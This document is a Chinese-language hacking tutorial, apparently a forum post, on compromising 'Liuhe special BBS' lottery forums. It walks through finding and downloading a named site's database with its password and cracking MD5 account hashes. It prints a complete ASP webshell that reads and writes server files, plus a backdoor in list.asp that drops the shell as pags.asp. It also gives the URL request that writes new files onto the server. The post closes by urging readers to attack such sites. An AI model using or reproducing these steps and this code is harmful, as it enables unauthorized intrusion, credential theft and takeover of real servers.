先在 baidu 搜 “六合專(zhuān)用BBS v1.0”當(dāng)然你搜 v2.0 、v3.0 都可以!“找到相關(guān)網(wǎng)頁(yè)約23,000篇,用時(shí)0.017秒”我們看一下非常多的,隨便進(jìn)一個(gè)吧。
http://www.ky8888.com/bbs/list.asp
找到Domain2.2.exe,的 SearchPage.txt,
在里面加查找頁(yè) /fdnews.asp /bbs/fdnews.asp,好了現(xiàn)在我們來(lái)掃掃看!哇,好多啊,這個(gè)就是數(shù)據(jù)庫(kù)了,我們用網(wǎng)際快車(chē) 把他下下來(lái),昏 ,打開(kāi)要密碼,就密碼這個(gè)東西啦: newbbs.cn88 ,現(xiàn)在 帳號(hào)、密碼,就盡收眼底了,嘿嘿!~~現(xiàn)在把 md5 加密的東西放 MD5Crack 2.3 去跑吧,看你運(yùn)氣咯!~
不過(guò)我們今天要的不是它的密碼,而是webshell。大家跟我來(lái),馬上會(huì)有驚人的發(fā)現(xiàn)。打開(kāi)數(shù)據(jù)庫(kù)的zl表,找到idto 的字段,怎么了發(fā)現(xiàn)什么了嗎?這個(gè)好象是一個(gè)網(wǎng)頁(yè)哦,嘿嘿!~~
代碼如下:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body bgcolor="#FFFFFF">
<%
Function GetPP
dim s
s=Request.ServerVariables("path_translated")
GetPP=left(s,instrrev(s,"\",len(s)))
End function
MODE=Request("MODE")
sPP=Request("PP")
if sPP="" then sPP=GetPP
if right(sPP,1)<>"\" then sPP=sPP&"\"
Response.Write "<b>Index of "&sPP& "</b>"
%>
<%fname=request("fname")
if fname<>"" then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if request("save")="" then
Set objCountFile = objFSO.OpenTextFile(fname,1,True)
If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll
else
fdata=request("fdata")
Set objCountFile=objFSO.CreateTextFile(fname,True)
objCountFile.Write fdata
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
end if
%>
<form method=POST>
<table border=0 cellspacing=0 bgcolor=#000000>
<tr>
<td><table border=0 cellpadding=10 cellspacing=0 bgcolor=#FFFFFF>
<tr>
<td><table bordercolor=#0080FF bgcolor=#FFFFD0 border=1>
<tr>
<td bgcolor="#0080FF"><font color="#FFFFFF">change:<%=fname%></font></td>
<tr>
<td><input type="submit" value="ok" name="save"><input type="reset" value="reset"><br>
<textarea rows="22" name="fdata" cols="100"><%=fdata%></textarea></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
再認(rèn)真看看,其實(shí)這就是一個(gè)webshell,所有的六合彩專(zhuān)用論壇的數(shù)據(jù)庫(kù)里面都有。它出生的時(shí)間可能比海洋頂端2003 還要早,是asp木馬界的鼻祖了。
既然數(shù)據(jù)庫(kù)的文件名是asp的后綴,而里面又自帶一個(gè)asp木馬,我們來(lái)試試直接打開(kāi)這個(gè)數(shù)據(jù)庫(kù)地址,
http://www.ky8888.com/bbs/fdnews.asp昏,可以看出木馬里面的asp 代碼并沒(méi)有執(zhí)行,也就是說(shuō)我們拿了一只死馬。
這就是我12月25號(hào)的號(hào)的發(fā)現(xiàn),拿到這個(gè)之后就和兄弟 ☆罹天燼☆ 討論過(guò)(czy也給予了幫助),開(kāi)始認(rèn)為只要拿到網(wǎng)站在服務(wù)器上的絕對(duì)路徑就可以在本地提交,寫(xiě)入我們自己的木馬,但是實(shí)驗(yàn)卻一直沒(méi)有成功。
雖然我手里有一個(gè)這樣的論壇,但是有幾個(gè)重要的頁(yè)面丟失了,一時(shí)也看不出一個(gè)所以然來(lái),這樣一拖就是十幾天,
前天我再把這個(gè)論壇的代碼拿出來(lái)看,在list.asp 里面發(fā)現(xiàn)一段重要的東西.
<%
if len(page)>6 then
if md5(md5(page))="8f9fc56c3d174202" then
dim fname
fname=""&sPP&"pags.asp"
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(fname,True)
objCountFile.Write ""& idto &""
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
response.write "SORRY <br>"
response.write "ID?????"
response.end
end if%>
注意到了嗎?""& idto &"" 這里的idto 不就是數(shù)據(jù)庫(kù)里面放asp木馬的字段嗎?嘿嘿,那么上面的pags.asp,就應(yīng)該是寫(xiě)入的文件名咯?我們來(lái)試試看,到底是不是這樣的!
提交:http://www.ky8888.com/bbs/pags.asp
看到?jīng)]有這個(gè)古老的asp木馬終于顯身了,首先它可以看到網(wǎng)站在服務(wù)器上的絕對(duì)路徑,第二還可以寫(xiě)入文件。有人看到這個(gè)木馬很郁悶,因?yàn)樗緵](méi)有寫(xiě)入文件的路徑的設(shè)置表單,是不是我們提交的數(shù)據(jù)庫(kù),都進(jìn)了數(shù)據(jù)庫(kù)了呢?
來(lái)看看原代碼,這一句 Set objCountFile = objFSO.OpenTextFile(fname,1,True)
看這里是寫(xiě)入了文件fname, 而不是數(shù)據(jù)庫(kù),我們先要請(qǐng)求文件fname 寫(xiě)入的路徑,在ie 提交:http://www.ky8888.com/bbs/pags.asp?fname=D:\ky8888\bbs\haotian.asp再填內(nèi)容 ,嘿嘿· ok 了 !,這樣D:\ky8888\bbs\haotian.asp 就是我們新建的文件了。
因?yàn)檫@個(gè)網(wǎng)站空間不支持fso,所以我直接把數(shù)據(jù)庫(kù)里面的木馬復(fù)制到朋友的asp空間去演示,看是不是寫(xiě)入文件成功了,嘿嘿!~~http://lvhuana.somee.com/haotian.asp?id=1
這樣簡(jiǎn)單就拿到了webshell,不過(guò)我試了另外幾個(gè)六合彩網(wǎng)站卻沒(méi)有發(fā)現(xiàn)這個(gè)pags.asp,看來(lái)這個(gè)里面還有東西要挖一挖。可能要等到拿了完整的 六合專(zhuān)用BBS 的代碼之后問(wèn)題就都解決了。
本文只是起到拋磚引玉的作用,還是那句話期望著大家一起走到打擊六合彩網(wǎng)站的道路上來(lái)!消減它們,國(guó)家的害蟲(chóng)……
我在寫(xiě)本文的同時(shí),也有很多人和我說(shuō),現(xiàn)在地下足彩也很泛濫,所以我專(zhuān)門(mén)聯(lián)系了一位國(guó)內(nèi)的黑足彩
高手,他將在近期出一篇關(guān)于消減足彩網(wǎng)站的文章。
